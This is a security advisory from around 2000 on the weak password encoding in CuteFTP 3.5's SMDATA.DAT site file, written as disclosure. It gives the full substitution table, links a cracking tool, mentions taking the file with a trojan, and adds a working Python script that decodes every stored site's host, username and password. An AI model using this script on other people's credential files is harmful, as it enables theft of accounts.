Exploits the weak encryption scheme utilized in CuteFTP.
Vulnerability in CuteFTP's password storage
-------------------------------------------
by black-hand, November 1999 / January 2000
Intro:
------
CuteFTP stores passwords using a simple character substitution. Because the
substitution table is easily derived, stored passwords can be recovered.
Using this technique an attacker can extract usernames and passwords for all
stored sites after obtaining the SMDATA.DAT file, either locally or
remotely using a trojan or other technique.
Applies to:
-----------
CuteFTP 3.5 and earlier versions
Discussion:
-----------
CuteFTP has an option of storing FTP sites for quick access at a later
stage. A site record holds all of the site's information, including the
relevant IP address or hostname, username and password. This is all stored
in the SMDATA.DAT file, which can be found in the CuteFTP directory. The
password is stored in this database using a simple ASCII substitution
between plaintext and ciphertext. This substitution is the same for all
user records.
SMDATA.DAT by default is located at: C:\Program Files\CuteFTP\SMDATA.DAT
Exploit:
--------
Opening the SMDATA.DAT file in an editor shows every record; the user
records are stored towards the end. An example of such records taken from
a SMDATA.DAT file is:
$^À^DTestftp.test.com^Duser^H©ª«^É^Ê^Ëö÷ ^B ^Ý ^U ^B ^?^?^?^?^B ^B ^B ^B
^B ^A
^B $^À^Dtest2www.test.com^Dtest^H¸©»»¿§º¬^Yinnitial remote directory^Qinitial
directory comments^B ^Ý ! ç^Cd ×zY^A^B ^B ^B ^B ^B ^Vlocal directory filter^[remotee directory filteeeer^A
^B
The $ sign signifies a new record, and this is followed by a number of
fields. Each string field is preceded by a single byte holding its length
(^D = 4 before "Test" and "user", ^H = 8 before the eight-character
password, ^V = 22 before "local directory filter"), which is why the
"delimiter" appears to be a different ASCII character each time (you will
need a compatible viewer to see these control characters). The records
are stored in this format:
$^À^DRECORD NAMEIP ADDRESS^DUSERNAME^HENCRYPTED PASSWORD^B ^Ý
For instance, from the first line of the first record you can read off this
information:
RECORD NAME = Test
IP ADDRESS = ftp.test.com
USERNAME = user
PASSWORD = ©ª«^É^Ê^Ëö÷
The rest of the fields are left blank or contain little or no information
(which tells the client to use its default values). Note that the port
number field is blank as well.
So, by enciphering a known plaintext and analysing the result, the means of
encipherment can be easily deduced. The above example shows the password
abcABC>? enciphered; the result in the records database is ©ª«^É^Ê^Ëö÷ .
From this you can deduce that a=© b=ª and so forth (note that it is
case-sensitive).
Therefore, when enciphering the following string:
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()`~-=\[]
';,./_+|{}:"<>?
we get:
^É^Ê^Ë^Ì^Í^Î^Ï^À^Á^Â^Ã^Ä^Å^Æ^Ç^Ø^Ù^Ú^Û^Ü^Ý^Þ^ß^Ð^Ñ^Ò©ª«¬®¯ ¡¢£¤¥¦§¸¹º»¼½¾¿°±²ùú
ûüýþ^?ðñøé^Èëìí^Öîâàᨶåõ^Ô^Ó^Õïóäæç^×ã´³µòêôö÷
so it is trivial to reverse the values from the SMDATA.DAT file and deduce
the user's password. Written out as byte values the table is in fact a
single XOR of every byte with 0xC8: a (0x61) becomes © (0xA9), p (0x70)
becomes ¸ (0xB8), 1 (0x31) becomes ù (0xF9) and 0 (0x30) becomes ø (0xF8),
so a single known password is enough to recover the whole table.
If an intruder has network or physical access to the SMDATA.DAT file in your
CuteFTP directory, then your passwords are compromised. The intruder will be
able to extract all the information necessary to break into your account
from the SMDATA.DAT file. The SMDATA.DAT file is typically ~17k in size,
depending on the number of entries.
Program to Exploit:
-------------------
A VB-based application is available to reverse CuteFTP-derived ciphertext
passwords. The TABLE.DAT file included consists of a single 188-character
line: the 94 plaintext characters followed by their 94 ciphertext
equivalents. A simple substitution is made from one to the other.
To use it, open the SMDATA.DAT file, copy the password information and
paste it into the program to reveal the password. The encrypted passwords
can be found between the ^H and ^B characters (ASCII values 8 and 2
respectively); note that the ^H is the password's length byte, so it will
be a different character for passwords that are not eight characters long.
The result is placed into TABLE.DAT (open it with a text editor).
The exploit (zipped) is downloadable at:
https://www.2600.org.au/advisories/cuteftp-1199.zip
An example of a SMDATA.DAT file can be downloaded at
https://www.2600.org.au/advisories/smdata.dat
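As an added example (not the advisory's VB program, and not CuteFTP's own
code), the following Python does what the Exploit and Program to Exploit
sections describe: it derives the substitution from the known pair abcABC>?
/ ©ª«^É^Ê^Ëö÷ quoted above, then walks the records of an SMDATA.DAT image
and decodes each password. It assumes that the caret notation used in the
dumps denotes the byte with 0x40 flipped (so ^À is 0x80, ^É is 0x89, ^D and
^H are 0x04 and 0x08), that each record begins with $^À, that the byte
before every string field is its length (the host's length byte is not
visible in the dumps and is assumed to follow the same rule), and that the
first four fields are name, host, username and password. The sample image
is constructed from the two records quoted above, with filler bytes in
place of the fields the parser does not read.

```python
"""Recover CuteFTP site passwords from an SMDATA.DAT image.

Added example, not the advisory's VB tool. Assumptions (read off the
dumps in the advisory, not documented by CuteFTP):
  * caret notation in the dumps is the byte with 0x40 flipped, so
    ^D = 0x04, ^H = 0x08, ^À = 0x80, ^É = 0x89;
  * a record starts with b"$\x80" and each string field is preceded by
    one byte holding its length (0x04 before "Test", 0x08 before an
    eight-byte password);
  * the first four fields are record name, host, username, password.
"""
from __future__ import annotations

from typing import Iterator, NamedTuple

RECORD_MARKER = b"$\x80"  # "$^À" in the dumps

# Known-plaintext pair quoted in the advisory: "abcABC>?" is stored as
# ©ª«^É^Ê^Ëö÷, i.e. the bytes A9 AA AB 89 8A 8B F6 F7.
KNOWN_PLAIN = b"abcABC>?"
KNOWN_CIPHER = bytes.fromhex("a9aaab898a8bf6f7")


def derive_xor_key(plain: bytes, cipher: bytes) -> int:
    """Return the single byte k with cipher[i] == plain[i] ^ k for all i.

    The advisory tabulates all 94 printable characters; once you notice
    the table is a constant XOR, one known password is enough.
    Raises ValueError if no single key explains every pair.
    """
    if not plain or len(plain) != len(cipher):
        raise ValueError("need a non-empty, equal-length known pair")
    keys = {p ^ c for p, c in zip(plain, cipher)}
    if len(keys) != 1:
        raise ValueError(f"not a single-byte XOR, candidates {sorted(keys)}")
    return keys.pop()


XOR_KEY = derive_xor_key(KNOWN_PLAIN, KNOWN_CIPHER)  # 0xC8


def decipher(cipher: bytes, key: int = XOR_KEY) -> str:
    """Undo the substitution; XOR is its own inverse."""
    return bytes(b ^ key for b in cipher).decode("latin-1")


def encipher(plain: str, key: int = XOR_KEY) -> bytes:
    """Produce what CuteFTP writes for a given password."""
    return bytes(b ^ key for b in plain.encode("latin-1"))


class SiteRecord(NamedTuple):
    name: str
    host: str
    username: str
    password: str


def _read_lstring(data: bytes, pos: int) -> tuple[bytes, int]:
    """Read one length-prefixed string at data[pos]; return (string, next pos)."""
    if pos >= len(data):
        raise ValueError("truncated record: no length byte")
    end = pos + 1 + data[pos]
    if end > len(data):
        raise ValueError("truncated record: string runs past end of data")
    return data[pos + 1:end], end


def parse_records(data: bytes) -> Iterator[SiteRecord]:
    """Yield every site record found in an SMDATA.DAT image."""
    pos = data.find(RECORD_MARKER)
    while pos != -1:
        p = pos + len(RECORD_MARKER)
        fields = []
        for _ in range(4):  # name, host, username, enciphered password
            field, p = _read_lstring(data, p)
            fields.append(field)
        name, host, user, pw = fields
        yield SiteRecord(name.decode("latin-1"), host.decode("latin-1"),
                         user.decode("latin-1"), decipher(pw))
        pos = data.find(RECORD_MARKER, p)


def extract_sites(data: bytes) -> list[SiteRecord]:
    return list(parse_records(data))


# Constructed sample image: the two records quoted in the advisory
# (ciphertext bytes transcribed from the dumps) wrapped in filler bytes
# standing in for the header and the fields this example does not parse.
SAMPLE_SMDATA = (
    b"\x00\x01filler header\x00"
    + RECORD_MARKER + b"\x04Test" + b"\x0cftp.test.com" + b"\x04user"
    + b"\x08" + KNOWN_CIPHER
    + b"\x02 \xdd \x15 \x02 \xff\xff\xff\xff\x02 \x02 \x02 \x02 \x02 \x01"
    + RECORD_MARKER + b"\x04test" + b"\x0cwww.test.com" + b"\x04test"
    + b"\x08" + bytes.fromhex("b8a9bbbbbfa7baac")  # ¸©»»¿§º¬ in the dump
    + b"\x19innitial remote directory" + b"\x11initial directory"
)

if __name__ == "__main__":
    for rec in extract_sites(SAMPLE_SMDATA):
        print(f"{rec.name:8} {rec.host:16} {rec.username:8} {rec.password}")
```

Read the file as bytes rather than copying from a text viewer: the length
bytes and several ciphertext values are non-printing (the host's length
byte does not even show in the dumps above), and a copy-and-paste through
an editor, as the VB tool requires, can silently lose or translate them.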
Note:
-----
There are several older "CuteFTP Password Crackers" available from
various internet sites. Given that source is not available for these and
that they make specific reference to "version 1.6/1.8", it is not known
whether they exploit the same weakness.
Contact:
--------
I can be contacted on black_hand@2600.org.au
homepage at https://asio.wiretapped.net/~apis
-black-hand